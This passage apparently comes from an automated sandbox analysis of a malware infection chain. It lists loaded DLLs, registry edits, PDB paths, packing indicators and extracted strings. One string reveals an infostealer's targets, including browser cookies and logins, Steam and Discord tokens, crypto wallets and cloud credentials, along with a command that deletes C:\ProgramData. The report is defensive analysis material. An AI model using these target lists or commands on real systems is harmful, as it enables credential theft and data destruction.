Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wininet.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iertutil.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: windows.storage.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wldp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: profapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: urlmon.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: srvcli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: netutils.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\HmPBpEK6p\rnHV2EM9rK6P.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\HmPBpEK6p\rnHV2EM9rK6P.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp	Section loaded: coremessaging.dll

Source: C:\Users\user\Desktop\1w5RpHuliE.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp

Window found: window name: TMainForm

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-OR0UK.tmp\rnHV2EM9rK6P.tmp

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\File Based Assistant_is1

Source: 1w5RpHuliE.exe

Static file information: File size 1848320 > 1048576

Source: 1w5RpHuliE.exe

Static PE information: Raw size of fhqdylkh is bigger than: 0x100000 < 0x191600

Source:	Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdb source: 976cb97ff6.exe, 00000018.00000003.2922018748.000000000482F000.00000004.00001000.00020000.00000000.sdmp, 976cb97ff6.exe, 00000018.00000002.2947993314.0000000000410000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: A{"id":1,"method":"Storage.getCookies"}\|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2comctl32gdi32:225121Windows 11HTTP/1.1HARDWARE\DESCRIPTION\System\CentralProcessor\0abcdefgh
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: xkV9ZML.exe, 00000007.00000002.2746126312.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb source: 976cb97ff6.exe, 00000018.00000002.2948683307.0000000000A89000.00000004.00000020.00020000.00000000.sdmp, 976cb97ff6.exe, 00000018.00000002.2953926669.0000000007184000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbMZ source: WERCB41.tmp.dmp.21.dr
Source:	Binary string: C:\Users\TOW\Desktop\TESTING CRYPTER\Dlls\LoaderDLL.pdb source: lt8kslFxQ.exe, 00000025.00000002.3403005309.00000000030F1000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdbH source: WERCB41.tmp.dmp.21.dr
Source:	Binary string: Acquire.pdb source: xkV9ZML.exe, 00000007.00000002.2748577375.0000000003919000.00000004.00000800.00020000.00000000.sdmp, xkV9ZML.exe, 00000007.00000000.2592368510.0000000000532000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: xkV9ZML.exe, 00000007.00000002.2746126312.00000000009FC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb source: 976cb97ff6.exe, 00000018.00000002.2953926669.0000000007184000.00000004.00000020.00020000.00000000.sdmp, 976cb97ff6.exe, 00000018.00000002.2951247939.0000000005053000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WERCB41.tmp.dmp.21.dr
Source:	Binary string: BitLockerToGo.pdb source: b7b5e2e140.exe, 0000000D.00000002.3109758340.000000000A6D0000.00000004.00001000.00020000.00000000.sdmp, 14b550e5e3.exe, 0000001B.00000003.3145250358.000000000E084000.00000004.00001000.00020000.00000000.sdmp, 6761aae677.exe, 0000001E.00000002.3396257355.000000000EC84000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: System.pdb) source: WERCB41.tmp.dmp.21.dr
Source:	Binary string: wntdll.pdbUGP source: lt8kslFxQ.exe, 00000025.00000002.3404815208.0000000003190000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: lt8kslFxQ.exe, 00000025.00000002.3404815208.0000000003190000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdbu\ source: Bjkm5hE.exe, 00000026.00000002.3401015940.0000000000401000.00000040.00000001.01000000.0000001F.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERCB41.tmp.dmp.21.dr
Source:	Binary string: BitLockerToGo.pdbGCTL source: b7b5e2e140.exe, 0000000D.00000002.3109758340.000000000A6D0000.00000004.00001000.00020000.00000000.sdmp, 14b550e5e3.exe, 0000001B.00000003.3145250358.000000000E084000.00000004.00001000.00020000.00000000.sdmp, 6761aae677.exe, 0000001E.00000002.3396257355.000000000EC84000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.PDBX source: xkV9ZML.exe, 00000007.00000002.2746126312.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\omtnkdoj\bnwv\yogisfk\cqf.pdbs source: 976cb97ff6.exe, 00000018.00000003.2922018748.000000000482F000.00000004.00001000.00020000.00000000.sdmp, 976cb97ff6.exe, 00000018.00000002.2947993314.0000000000410000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: System.pdb source: WERCB41.tmp.dmp.21.dr
Source:	Binary string: Battery.pdb source: 4dfe6dfd76.exe, 0000000E.00000000.2749975380.0000000000952000.00000002.00000001.01000000.0000000F.sdmp, 4dfe6dfd76.exe, 0000000E.00000002.2792713729.0000000003E39000.00000004.00000800.00020000.00000000.sdmp, WERCB41.tmp.dmp.21.dr
Source:	Binary string: System.Windows.Forms.pdb source: WERCB41.tmp.dmp.21.dr
Source:	Binary string: Battery.pdbD source: WERCB41.tmp.dmp.21.dr
Source:	Binary string: vdr1.pdb source: Bjkm5hE.exe, 00000026.00000002.3401015940.0000000000401000.00000040.00000001.01000000.0000001F.sdmp
Source:	Binary string: mscorlib.pdb source: xkV9ZML.exe, 00000007.00000002.2746126312.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, WERCB41.tmp.dmp.21.dr
Source:	Binary string: c:\bfllk\pdgh\qovxk\wqdtbmac.pdb/; source: 976cb97ff6.exe, 00000018.00000002.2948683307.0000000000A89000.00000004.00000020.00020000.00000000.sdmp, 976cb97ff6.exe, 00000018.00000002.2953926669.0000000007184000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERCB41.tmp.dmp.21.dr
Source:	Binary string: c:\jfmo\tlcp\nyvnyt\obocmwsb.pdb/; source: 976cb97ff6.exe, 00000018.00000002.2953926669.0000000007184000.00000004.00000020.00020000.00000000.sdmp, 976cb97ff6.exe, 00000018.00000002.2951247939.0000000005053000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: xkV9ZML.exe, 00000007.00000002.2746126312.00000000009B3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdb source: Bjkm5hE.exe, 00000026.00000002.3401015940.0000000000401000.00000040.00000001.01000000.0000001F.sdmp
Source:	Binary string: System.ni.pdb source: WERCB41.tmp.dmp.21.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\1w5RpHuliE.exe	Unpacked PE file: 0.2.1w5RpHuliE.exe.ed0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fhqdylkh:EW;rgnmtfpx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fhqdylkh:EW;rgnmtfpx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.6f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fhqdylkh:EW;rgnmtfpx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fhqdylkh:EW;rgnmtfpx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 3.2.skotes.exe.6f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fhqdylkh:EW;rgnmtfpx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fhqdylkh:EW;rgnmtfpx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 6.2.skotes.exe.6f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;fhqdylkh:EW;rgnmtfpx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;fhqdylkh:EW;rgnmtfpx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1077994001\b4fe2af6b4.exe	Unpacked PE file: 22.2.b4fe2af6b4.exe.520000.0.unpack :EW;.rsrc:W;.idata :W; :EW;sofxbkhh:EW;aglvcmjg:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;sofxbkhh:EW;aglvcmjg:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1077996001\976cb97ff6.exe	Unpacked PE file: 24.2.976cb97ff6.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;vzyisczj:EW;dmlhidtb:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;vzyisczj:EW;dmlhidtb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Unpacked PE file: 25.2.cbf2b6294a.exe.580000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zupxjdus:EW;uobxgjrq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zupxjdus:EW;uobxgjrq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1077998001\14b550e5e3.exe	Unpacked PE file: 27.2.14b550e5e3.exe.ab0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;ntxndjay:EW;aqsepqko:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;ntxndjay:EW;aqsepqko:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Unpacked PE file: 28.2.KbSwZup.exe.d60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;byidmovu:EW;ifcaqyxp:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;byidmovu:EW;ifcaqyxp:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1078000001\6761aae677.exe	Unpacked PE file: 30.2.6761aae677.exe.ed0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nilnxrfd:EW;fegmkaub:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nilnxrfd:EW;fegmkaub:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1078001001\ViGgA8C.exe	Unpacked PE file: 31.2.ViGgA8C.exe.e10000.0.unpack :EW;.rsrc:W;.idata :W; :EW;efrqcofg:EW;yqrfybbc:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\filebasedassist.exe	Unpacked PE file: 36.2.filebasedassist.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\File Based Assistant 21.3.4.0\filebasedassist.exe

Unpacked PE file: 36.2.filebasedassist.exe.400000.0.unpack

.NET source code contains method to dynamically call methods (often used by packers)

Source: random[1].exe0.6.dr, PjMboxrZKVMRiayL4T.cs	.Net Code: i2YYN1EXNBPCmRatdf4(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{i2YYN1EXNBPCmRatdf4(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: 4dfe6dfd76.exe.6.dr, PjMboxrZKVMRiayL4T.cs	.Net Code: i2YYN1EXNBPCmRatdf4(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{i2YYN1EXNBPCmRatdf4(typeof(IntPtr).TypeHandle),typeof(Type)})
Source: 14.2.4dfe6dfd76.exe.3e39550.0.raw.unpack, PjMboxrZKVMRiayL4T.cs	.Net Code: i2YYN1EXNBPCmRatdf4(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{i2YYN1EXNBPCmRatdf4(typeof(IntPtr).TypeHandle),typeof(Type)})

Source: ViGgA8C[1].exe.6.dr

Static PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: PqodvBZ.exe.6.dr	Static PE information: real checksum: 0xdfbd should be: 0x14629
Source: b4fe2af6b4.exe.6.dr	Static PE information: real checksum: 0x2051f5 should be: 0x200e18
Source: Bunifu_UI_v1.5.3.dll.29.dr	Static PE information: real checksum: 0x0 should be: 0x400e1
Source: ViGgA8C.exe.6.dr	Static PE information: real checksum: 0x1bb953 should be: 0x1c86bc
Source: random[1].exe2.6.dr	Static PE information: real checksum: 0x0 should be: 0x557df
Source: 6761aae677.exe.6.dr	Static PE information: real checksum: 0x407ca1 should be: 0x40fe05
Source: xkV9ZML.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x6c817
Source: 976cb97ff6.exe.6.dr	Static PE information: real checksum: 0x211701 should be: 0x20890f
Source: 4dfe6dfd76.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0xbb8c2
Source: 14b550e5e3.exe.6.dr	Static PE information: real checksum: 0x3f73cd should be: 0x40137a
Source: KbSwZup.exe.6.dr	Static PE information: real checksum: 0x2018ae should be: 0x1f90ce
Source: random[3].exe.6.dr	Static PE information: real checksum: 0x407ca1 should be: 0x40fe05
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x1c524a should be: 0x1cb3b8
Source: random[1].exe0.6.dr	Static PE information: real checksum: 0x0 should be: 0xbb8c2
Source: cbf2b6294a.exe.6.dr	Static PE information: real checksum: 0x2053d8 should be: 0x2011ef
Source: random[2].exe0.6.dr	Static PE information: real checksum: 0x2053d8 should be: 0x2011ef
Source: ViGgA8C[1].exe.6.dr	Static PE information: real checksum: 0x1bb953 should be: 0x1c86bc
Source: random[1].exe1.6.dr	Static PE information: real checksum: 0x2051f5 should be: 0x200e18
Source: xkV9ZML[1].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x6c817
Source: rnHV2EM9rK6P.exe.29.dr	Static PE information: real checksum: 0x0 should be: 0x3dcbfe
Source: PqodvBZ[1].exe.6.dr	Static PE information: real checksum: 0xdfbd should be: 0x14629
Source: 1w5RpHuliE.exe	Static PE information: real checksum: 0x1c524a should be: 0x1cb3b8
Source: random[2].exe1.6.dr	Static PE information: real checksum: 0x3f73cd should be: 0x40137a
Source: lt8kslFxQ.exe.29.dr	Static PE information: real checksum: 0x0 should be: 0x3e1322
Source: d755f09e83.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x557df
Source: KbSwZup[1].exe.6.dr	Static PE information: real checksum: 0x2018ae should be: 0x1f90ce
Source: Bjkm5hE[1].exe.6.dr	Static PE information: real checksum: 0x1b99da should be: 0x1b6df8
Source: Bjkm5hE.exe.6.dr	Static PE information: real checksum: 0x1b99da should be: 0x1b6df8
Source: random[2].exe.6.dr	Static PE information: real checksum: 0x211701 should be: 0x20890f

Source: 1w5RpHuliE.exe	Static PE information: section name:
Source: 1w5RpHuliE.exe	Static PE information: section name: .idata
Source: 1w5RpHuliE.exe	Static PE information: section name:
Source: 1w5RpHuliE.exe	Static PE information: section name: fhqdylkh
Source: 1w5RpHuliE.exe	Static PE information: section name: rgnmtfpx
Source: 1w5RpHuliE.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: fhqdylkh
Source: skotes.exe.0.dr	Static PE information: section name: rgnmtfpx
